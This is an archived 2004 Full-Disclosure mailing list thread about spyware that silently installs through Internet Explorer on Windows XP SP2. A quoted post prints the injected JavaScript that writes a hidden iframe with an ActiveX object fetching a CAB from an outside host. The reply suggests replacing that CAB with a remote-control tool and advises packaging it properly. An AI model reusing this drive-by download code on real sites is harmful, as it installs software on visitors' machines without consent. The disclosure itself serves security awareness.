lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <b7bc1b1f0410042333589cd1b7@mail.gmail.com>
From: uberguidoz at gmail.com (GuidoZ)
Subject: Spyware installs with no interaction in IE on fully patched XP SP2 box

> If you want a laugh, replace the CAB files which WinVNC or somesuch.

Intriguing indeed. However, you'll want to make a CAB file out of it,
not just an EXE. The CLSID and install params are for CABs. Not to
difficult to do though with a little Google hunting and some time. =)

--
Peace ~G


On Mon, 4 Oct 2004 10:15:46 -0500 (CDT), Gossi The Dog
<gossi@...te.veritynet.net> wrote:
> Yes...  ThemeXP.org has this in the HTML..
> 
> <!-- AUTO_PROMPT AD START --><script language="JavaScript"
> type="text/JavaScript
> "
> src="http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js"></script>
> <!-- AUTO_PROMPT AD END -->
> 
> Which calls...
> 
> http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
> 
> Which contains...
> 
>                  document.write('<iframe id="downloads_manager"
> style="position:a
> bsolute;visibility:hidden;"></iframe>');
> 
>                document_code = '<html><head>\n';
>                document_code += '<\/head><body>\n';
>                document_code += '<object onerror="window.parent.retry();"
> id="DDo
> wnload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
> codebase="http:
> //www.addictivetechnologies.net/DM0/cab/ATPartners.cab" HEIGHT=0
> WIDTH=0><PARAM
> NAME="AffiliateID"
> VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n
> ';
>                document_code += '<\/body><\/html>';
>                downloads_manager.document.write(document_code);
>                downloads_manager.document.close();
> 
>                  setCookie('minpopup80wu03rd','test',1);
> 
> ...which downloads http:
> //www.addictivetechnologies.net/DM0/cab/ATPartners.cab
> 
> ...which means those using shitty MS browsers get owned, again.
> 
> If you want a laugh, replace the CAB files which WinVNC or somesuch.
> 
> --g
> 
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ